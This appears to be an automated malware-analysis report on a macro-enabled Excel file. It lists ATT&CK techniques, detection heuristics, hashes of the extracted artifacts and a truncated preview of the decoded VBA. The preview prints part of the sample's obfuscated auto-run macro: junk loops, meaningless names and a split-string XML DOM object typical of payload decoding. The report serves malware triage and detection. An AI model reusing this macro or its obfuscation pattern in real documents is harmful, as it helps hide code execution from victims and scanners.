MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The OOXML file contains a Workbook_Open VBA macro that uses CreateObject and Shell() calls, indicating an attempt to execute arbitrary code. The VBA code is heavily obfuscated with loops and meaningless variable names, suggesting it is designed to download and run a secondary payload. No specific IOCs like URLs or file paths were directly extractable from the obfuscated script.
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15866 bytes |
SHA-256: c36d302d468edd885aadd672bcb18523926ec250eec377a20b060a9cf94e68ba |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
NIWEddPGn_wMxnC.N1h6ucUPzurqxAXWLrtT
While 17 = 9453
Dim r9WKxZOo7fzQl1_1p4R9FnMLznbXZkiBTy_OcVGSMoSR4Y As String
Wend
Dim AgqQYtMCtIT As Integer
While 2 = 3605
Dim H7zNU7w6vusWRv8uZT4QYifW33PlikB As String
Wend
Dim dRB9VVZ7UFcQIP As Integer
While 18 = 5258
Dim HWeZ9vqz24iZbUaoIUJsNDPvkW_VgJ6PUEseuKjxSmZFY53_ As String
Wend
Dim dp6FFZA_Er As Integer
While 9 = 1323
Dim xkvSRp8Q_Vl638uUYjmIVpc421NxI4DnXBV8A As String
Wend
Dim TsHFyfbhv7 As Integer
While 21 = 7163
Dim TtAYZ5TGF1aaaHFIQ7f1jvTYO3ANz7aRDPcY3mLbqM1H As String
Wend
Dim f3Q9_nNdA5 As Integer
While 16 = 6079
Dim UhYjIg4_QHXHVJopPmtCHU5J3VkANJr7PH44_Qcnhk6qsWeESRWjs7 As String
Wend
Dim u_lMqv53zEZa1 As Integer
While 12 = 1276
Dim MPtp8I_dgYLZe1dp5vFMRV4QujpsotyPQePyilYZmbMiYwK5YK As String
Wend
Dim SRLg1Ub4VbU As Integer
While 13 = 6337
Dim yvi6G9ioFQVpjzHS17XtRbye7_7YbFrB7PlZ_boKTtDl6k As String
Wend
Dim lqqBj68qCV As Integer
While 15 = 1898
Dim D8BBIK_iTsRMrRXQLXhWKhTbNqYeuCNMOb6clHJgDBk2Sc9rKnuQd8tdmi As String
Wend
Dim vavcxPdD7NV4 As Integer
While 2 = 2293
Dim oCM_SH7bGurqSFQ6sQqazBUsujMSWNesUP9qDcnkfJZ_sD As String
Wend
Dim Hp9gTog5ClqdN As Integer
While 19 = 4043
Dim r5lD3O8TBGi1OlE4ojT9pZfTy4yKYM As String
Wend
Dim U_iN5o3EgtusF As Integer
While 27 = 3913
Dim hXoDBZAWAUdgQWQN9Zu5xuiQ_qY_iCjM7S86HyvuXyTnD As String
Wend
Dim pmQkzhR9wQvyWC As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "NIWEddPGn_wMxnC"
Dim kuA327EtDljrI2w2YNo51OJbDnIBS3_e8RzTg4VT7fpAVTEWNIn7X_fUjhyMwCYIg_tzBaSd1S7SiHErguwINGE3vct9DHg4FecQjNUwyH__FKuZbFo As String
Dim cYXEn1rPSMVgsAy_GeXHb5cRCk9ZQqNFa_984ZN_T3wqHZmcEinOhxXg5ECC2Q9l8OErA1_pOXwhGvIk7dSqB9gmkaBxWKFB4Ir2T4bNd89HAyYG6Z_V8Pi9qbFixOQDPtn7DPPBBDKD_W As String
Dim PRU4IsO2k_bbCZ5MNRVKOG6DAZMWNG6_lN1rxKkBJ1u63Zrnsm_aAbrHVQ3rd1mcHWzxhLYCqTAX As Integer
Function T__x8tPj7YU_Hm_f8Z4MSDGWrdQMHBJEuuatWAV3v_o2OuXn9(BMktVGIyjpnxKF1Oslwf6fnxwJvibiaDHl1o6uaxh7fc3T9fX7Aky_8dhv6KTjVANiohNJS7J978_J4aJOJdgzNGnVEHxNb8jdMSoYQLmDYyB9dW2d__Y1cWSf42DIG5f9Vd6ivu871)
While 4 = 1772
Dim g17E3W7trUor9roNFBomLIIlOBVDanMUzxy7eGVAWs2GpWjJIGioB8wVp As String
Wend
Dim Szz_2RCGS1J2qs8 As Integer
While 14 = 1820
Dim omOcQA51aK3R_gS2_bPKPe_dZy_VfXRbXj_WrS_oW9Xx897i99IYZfqH As String
Wend
Dim mtCa_hTB3Z4d As Integer
While 5 = 6016
Dim g5IpVjwPFJeZ1ZVfM2B121t7PlnynV5g_aBDx As String
Wend
Dim cBysYBbNkjiJww As Integer
cYXEn1rPSMVgsAy_GeXHb5cRCk9ZQqNFa_984ZN_T3wqHZmcEinOhxXg5ECC2Q9l8OErA1_pOXwhGvIk7dSqB9gmkaBxWKFB4Ir2T4bNd89HAyYG6Z_V8Pi9qbFixOQDPtn7DPPBBDKD_W = "MsXMl" & "2.dOMDOCumEnt"
While 2 = 6187
Dim WClpJKYs68ltN7UYXRrtzKFbxPrnBDm1h5HByU3kDQ2uwQLPOIJ2DCHK5H As String
Wend
Dim ctp1StJRxSiC As Integer
While 5 = 4703
Dim XEpgRUnfCaX13tveu7Eoc9GRjAZBF4a5jGc8Vk2hdTyBUx As String
Wend
Dim h8ofzL3hX7 As Integer
While 26 = 9437
Dim V6Q4kYH9bPuPwHI_gJHHE6uB2DZVkrphDA9nin25pB3gLPIfVuorYO1ZIOB As String
Wend
Dim g8uWtjKLvHd As Integer
Dim Vj_2GvT69YxmjKkfSTXo2PtVfsozrXaQWAo1MPvc_7krTeBPACqWQnQEzqTXFdLj7fOhetRCh5o5nAA_qWxopC9rsi_e5WVdsAuwObtPsnyV8UZypSprog33gfy6swFIhIJmOLtNmf
While 5 = 3359
Dim e3QMbCCMyj44_zB7HwHgdRkT64nH6ACVV1NvYKwwW5ZZlCug As String
Wend
Dim qmBXlj_KP7PgX3Q As Integer
While 22 = 1812
Dim xffgHjOf7_UIh2Jq3HEaR8msuzCdb5 As String
Wend
Dim NWcml3Eel7ZE_ As Integer
While 11 = 8598
Dim WPZZSENVWRa8y3vuQftDBu7o5OPkWfH_L3NaTXsXL As String
Wend
Dim g1_Bnv_RsTYoB As Integer
Dim ZrqYf9VU7Oclhd6xNZjxVwNDzcOoAv23gpVHcRaJ9rKBbRH4OT3kGIHlbmiBsqTJ
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 45568 bytes |
SHA-256: 26afe8bdc8c0721b061167bc7cfb01aaf218c23fe81d651f23a3db6e72ba7008 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.